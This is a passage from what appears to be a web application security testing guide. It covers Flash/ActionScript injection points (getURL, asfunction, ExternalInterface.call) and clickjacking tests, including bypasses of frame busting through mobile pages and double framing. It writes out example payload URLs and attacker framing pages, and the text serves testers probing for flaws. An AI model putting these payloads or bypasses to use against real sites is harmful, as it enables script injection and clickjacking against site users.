Then this will mean it’s possible to call JavaScript in the same domain
where the movie is hosted by requesting:
http://victim/file.swf?URI=javascript:evilcode
getURL('javascript:evilcode', '_self');
The same applies when only some part of the getURL argument is controlled:
// DOM injection with Flash JavaScript injection
getURL('javascript:function(' + _root.arg + ')');
asfunction:
You can use the special asfunction protocol to cause the link to execute an ActionScript function in a SWF file instead of opening a URL.
Until release Flash Player 9 r48 asfunction could be used on every
method which has a URL as an argument. After that release, asfunction was restricted to use within an HTML TextField.
This means that a tester could try to inject:
asfunction:getURL,javascript:evilcode
in every unsafe method like:
loadMovie(_root.URL)
by requesting:
http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode
ExternalInterface:
ExternalInterface.call is a static method introduced by Adobe to improve player/browser interaction for both ActionScript 2.0 and ActionScript 3.0.
From a security point of view it could be abused when part of its argument could be controlled:
flash.external.ExternalInterface.call(_root.callback);
the attack pattern for this kind of flaw should be something like
the following:
eval(evilcode)
since the internal JavaScript which is executed by the browser
will be something similar to:
eval('try { __flash__toXML(' + _root.callback + ') ; } catch (e) { "<undefined/>"; }')
Result Expected:
If you can see both the text “Website is vulnerable to clickjacking!” at the top of the page and your target web page successfully loaded into the frame, then your site is vulnerable and has no type of protection against clickjacking attacks. Now you can directly create a “proof of concept” to demonstrate that an attacker could exploit this vulnerability.
Bypass Clickjacking protection:
If you can only see the target site, or only the text “Website is vulnerable to clickjacking!” but nothing in the iframe, the target probably has some form of protection against clickjacking. It is important to note that this is not a guarantee that the page is totally immune to clickjacking.
Methods to protect a web page from clickjacking can be divided into two macro-categories:
• Client side protection: Frame Busting
• Server side protection: X-Frame-Options
In some circumstances, every single type of defense could be bypassed. The main methods of protection from these attacks, and techniques to bypass them, are presented below.
Client side protection: Frame Busting
The most common client side method developed to protect a web page from clickjacking is called Frame Busting, and it consists of a script in each page that should not be framed. The aim of this technique is to prevent a site from functioning when it is loaded inside a frame.
The structure of frame busting code typically consists of a “conditional statement” and a “counter-action” statement. For this type of protection, there are some workarounds that fall under the name of “Bust frame busting”. Some of these techniques are browser-specific while others work across browsers.
Mobile website version
Mobile versions of the website are usually smaller and faster than the desktop ones, and they have to be less complex than the main application. Mobile variants often have less protection, since there is the wrong assumption that an attacker cannot attack an application from a smart phone. This is fundamentally wrong, because an attacker can fake the real origin given by a web browser, so that a non-mobile victim may be able to visit an application made for mobile users. From this it follows that in some cases it is not necessary to use techniques to evade frame busting when there are unprotected alternatives which allow the use of the same attack vectors.
Double Framing
Some frame busting techniques try to break out of the frame by assigning a value to the “parent.location” attribute in the “counter-action” statement.
Such actions are, for example:
• self.parent.location = document.location
• parent.location.href = self.location
• parent.location = self.location
This method works well until the target page is framed by a single page. However, if the attacker encloses the target web page in one frame which is nested in another one (a double frame), then trying to access “parent.location” becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation.
Target site frame busting code (target site):
if (top.location != self.location) {
    parent.location = self.location;
}
Attacker's top frame (fictitious2.html):
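A hedged sketch of the attacker's pages (the inner file name fictitious.html is an assumption) could be:

<!-- fictitious2.html: attacker's top frame -->
<iframe src="fictitious.html"></iframe>

<!-- fictitious.html: attacker's intermediate frame (name assumed), which in turn
     frames the target page; the target's frame busting code now runs in a nested
     frame and its attempt to navigate parent.location is blocked by the browser -->
<iframe src="http://target.site"></iframe>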